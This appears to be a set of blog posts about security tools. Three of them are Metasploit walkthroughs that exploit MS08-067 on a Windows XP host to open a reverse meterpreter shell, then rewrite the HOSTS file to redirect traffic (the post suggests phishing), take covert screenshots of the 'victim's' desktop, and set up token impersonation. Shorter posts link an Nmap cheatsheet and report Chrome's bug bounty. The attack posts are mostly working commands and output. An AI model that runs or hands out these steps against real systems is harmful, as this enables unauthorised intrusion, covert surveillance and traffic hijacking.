NMAP 5 Cheatsheet

Here’s a nice little cheatsheet for NMAP 5 making it’s rounds today on the internet:

http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Very handy.

Posted in Internet, Networking, Security, Software | No Comments

Modifying The Victim’s HOSTS File In Metasploit

This is just a quick example of how you can quickly and easily modify the HOSTS file on a compromised Windows system using the meterpreter script called hostsedit.  As always, we start off with a basic exploit to gain a meterpreter session back from the victim’s machine:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1085)

meterpreter >

Now we are just going to run the hostsedit meterpreter script, look at the options, and modify the HOSTS file:

meterpreter > run hostsedit -h
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.

OPTIONS:

-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.

Example:

run hostsedit -e 127.0.0.1,google.com

run hostsedit -l /tmp/fakednsentries.txt

meterpreter > run hostsedit -e 127.0.0.1,www.google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts82257.back
[*] Adding Record for Host www.google.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter >

Looks like it was successful.  Let’s see:

Worked like a charm.  Of course you can do many other things than to just pipe www.google.com to localhost.  (setup an evil web server lately??  simple phishing site??)

Posted in Internet, Privacy, Security, Windows | 1 Comment

Taking Screenshots Of The Victim’s Computer With Metasploit

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module.  Start with a basic exploit to gain a meterpreter session.  You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name   Arch   User   Path
—   —-   —-   —-   —-
0   [System Process]
4   System   x86   NT AUTHORITY\SYSTEM
384   smss.exe   x86   NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
524   csrss.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
704   lsass.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
972   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
1124   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192   svchost.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\system32\svchost.exe
1452   spoolsv.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe   x86   VM-WINXP\Troy   C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\ctfmon.exe
656   alg.exe   x86 NT   AUTHORITY\LOCAL SERVICE   C:\WINDOWS\System32\alg.exe
1252   wscntfy.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\wscntfy.exe
1940   firefox.exe   x86   VM-WINXP\Troy   C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen:

That’s it.  You are now viewing the victim’s desktop without them even knowing you are there.

Posted in Internet, Networking, Privacy, Security | 1 Comment

Using Metasploit’s Incognito To Impersonate User Tokens

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system.  You can think of tokens as a web “cookie” which is just an object that holds your security information for the entire login process so that you don’t have to re-authenticate yourself on the system or network each time you want to access another object.  You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system.  For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
—-      —————  ——–  ———–
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
—  —-
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)

meterpreter >

Posted in Internet, Networking, Privacy, Security, Windows | 2 Comments

Your Google Chrome Bugs Could Be Worth $500-$1337

Google has recently launched an “experimental new incentive” that could reward security researchers for their bugs in the Chrome browser (all versions – stable, beta, and dev) or in the open source Chromium project itself.  Their base reward is identical to Mozilla’s at $500, but they are offering a higher reward of $1337 for “particularly severe or particularly clever” bugs/vulnerabilities.

I personally like this and I hope a lot of researchers step up and claim the rewards.  The more bugs that get reported responsibly, the more secure the users of the Chrome browser will be.  Coupled with the major built-in security features already in place, this could very well put Chrome on top of the browser market.

Source:
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html

Posted in Internet, Security, Software | No Comments